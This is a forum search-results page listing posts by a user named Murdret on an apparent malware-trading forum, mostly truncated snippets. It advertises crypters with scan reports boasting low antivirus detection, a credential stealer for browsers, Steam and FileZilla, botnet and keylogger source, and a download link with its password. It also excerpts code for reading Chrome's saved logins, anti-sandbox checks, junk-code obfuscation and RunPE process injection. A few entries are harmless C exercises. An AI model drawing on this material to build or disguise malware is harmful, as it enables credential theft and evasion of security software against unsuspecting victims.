Search results

  1. Murdret

    Shell_UPCheck 0.2 [by MixLoL]

    #Created by MixLoL (Amazon Underground) #Website/Contact: <!-- m --><a class="postlink" href="" onclick=";return false;"></a><!-- m --> // <!-- m --><a class="postlink" href=""...
  2. Murdret

    AC/DC Crypter

    Download:!MVJHQIhR!P3YeLi_9xSCLnR5fWyQ-cmikSpQrf0M_8Dzy6VmVMNo Pass: Emu's Encryption Codetable: Password: KLNZLM3RJMKC81WS TM1MT XHZVR B8T
  3. Murdret

    MAFIA - Mod charley

    Date and Time: 8/4/2013 10:16:29 AM File Name: stub.exe File Size: 131072 Bytes MD5: 07269479cce8951ce4ff27ce21e74a06 SHA1: 63947420c1606dcefbf77665ce62a78714c70126 Detection: 2 of 35 (6%) Status: INFECTED AVG Free - Clean! ArcaVir - Clean! Avast - Clean! AntiVir (Avira) - TR/Crypt.FKM.Gen...
  4. Murdret

    Crypter Nº 53 FREE

    STUB File Info: File Name: STUB.EXE Date|Time: 7-08-13,09:24:44 Report Generated by LeVeL-23.Co File Size: 90112 Bytes Detection: 1 of 35 Detections: AVG Free-Clean ArcaVir-Clean Avast-Clean AntiVir (Avira)-TR\/Dropper.Gen BitDefender-Clean VirusBuster Internet Security-Clean Clam...
  5. Murdret

    skrillex crypt0r - Mod charley

    Date and Time: 8/8/2013 10:34:55 AM File Name: Stub.exe File Size: 237568 Bytes MD5: 0423c620f1efe9c6d133c529acfc6ab6 SHA1: 45d390cfe82bc62c06241e5470eb4c7d762b4de3 Detection: 3 of 35 (9%) Status: INFECTED AVG Free - Clean! ArcaVir - Clean! Avast - Clean! AntiVir (Avira) - TR/Dropper.Gen...
  6. Murdret

    Simple Protector By Naker90 [Drag&Drop

    [+] Probado en W7 x64 con CyberGate 1.07 Scan: Url FileName = CyberGate.exe FileSize = 1,004,286 Kbs Scan : Detections = 1 Of 23 arcavir : OK avast : OK avg : OK avira : Is the TR/Dropper.Gen Trojan bitdefender : OK clamav : OK drweb : OK...
  7. Murdret

    THC Stealer v1

    Firefox Opera Safari Chrome IE MSN Steam User jDownloader v1 FileZilla Pidgin Download:
  8. Murdret

    Crypter Drag & Drop MOD

    Scan 2: File Info: File Name: Encriptado.exe SHA1: 9b588a0ec57c8b690df26ce702bce5140bec6f03 MD5: 6d6816b3bb2d775235150a9e3ca65372 Date|Time: 11-08-13,07:38:08 Report Generated by LeVeL-23.Co File Size: 135474 Bytes Detection: 2 of 35 Status: Infected Detections: AVG Free-Clean ArcaVir-Clean...
  9. Murdret

    [C++] Conversor Hexadecimal v2.0

    #include <iostream> #include <stdlib.h> #include <stdio.h> #include <windows.h> //Author: //pax01 - Conversor Hexadecimal using namespace std; int main() { SetConsoleTitle("Conversor Hexadecimal v2.0"); system("color 0A"); int n,r[10],i=0,number,j=0; char resp; printf("Ingrese el numero...
  10. Murdret

    BotnetY [C#]

    #include <winsock2.h> #include <string> #include <windows.h> #using <System.dll> using namespace std; using namespace System; using namespace System::Diagnostics; char flag; char flag1; string get_source(string url) { string adres; WSADATA WSAData; WSAStartup(MAKEWORD(2,0)...
  11. Murdret

    [C++] Password generator

    #include <ctype.h> #include <stdio.h> #include <windows.h> #include <stdlib.h> int main(int argc, char **argv) { inicio: SetConsoleTitle("Generador Aleatorio de Contrasenas"); system("color 0A"); unsigned char c; int a; int d; int e = 40; int f = 1...
  12. Murdret

    Introduccion C#

    Online: Download:
  13. Murdret

    [C] Impresion Codigo ASCII

    #include <stdio.h> #include <conio.h> #include <windows.h> unsigned char c; int main() { SetConsoleTitle("CODIGO ASCII"); for(c=0; c<255; c++) { printf("%d %c \n", c, c); if(c%24==0) Sleep(500); } getch(); return 0; }
  14. Murdret

    [C++] Zeus Killer

    #include <windows.h> #pragma warning(disable : 4005) // macro redefinition #include <ntdll.h> #pragma warning(default : 4005) #include <shlwapi.h> #include <shlobj.h> void GetZeusInfo(ULONG dwArg, PCHAR lpOut, DWORD dwOutLn, PCHAR lpMutex, DWORD dwMutexLn) { PSYSTEM_HANDLE_INFORMATION shi = 0...
  15. Murdret

    Google Chrome - Stealer Función [.Net]

    Public Shared Function GetChrome() As Object Dim obj2 As Object Dim baseName As String = (Environment.GetFolderPath(SpecialFolder.LocalApplicationData) & "\Google\Chrome\User Data\Default\Login Data") Try Dim instance As Object = New SQLiteHandler(baseName) NewLateBinding.LateCall(instance...
  16. Murdret

    [Source] GForce Keylogger con gmail Pass:
  17. Murdret

    BedderJuNK [Source]

    Public Sub BedderJuNK_UI9Hy6Vmvi() Dim DcjS67KnM As Decimal = -716469869 Try Catch ZM8N2QQfq As Exception If 0,06477761 = 0,4216151 Then Dim H84ZjZaR0fg5nT = 0,07980144 Dim UPFoJl2I As Long = 0,1066461 End Try If 0,4594007 < 0,7887713 If 0,5752565 = 0,07950956 Then Dim IcAiHgWh9o5nMBq =...
  18. Murdret

    antiSandbox [Clase]

    Option Explicit 'NTDLL Private Declare Function RtlGetCurrentPeb Lib "NTDLL" () As Long 'MSVBVM60 Private Declare Sub GetMem4 Lib "MSVBVM60" (ByVal Addr As Long, ByRef RetVal As Long) '--------------------------------------------------------------------------------------- ' Procedure ...
  19. Murdret

    RunPE cntpel [Clase]

    '--------------------------------------------------------------------------------------- ' Module : cNtPEL ' DateTime : 30/06/2009 06:32 ' Author : Cobein ' WebPage : (updated =D) ' Purpose : Inject Exe ' Usage : At your own risk '...
  20. Murdret

    Polymorphic Keylogger

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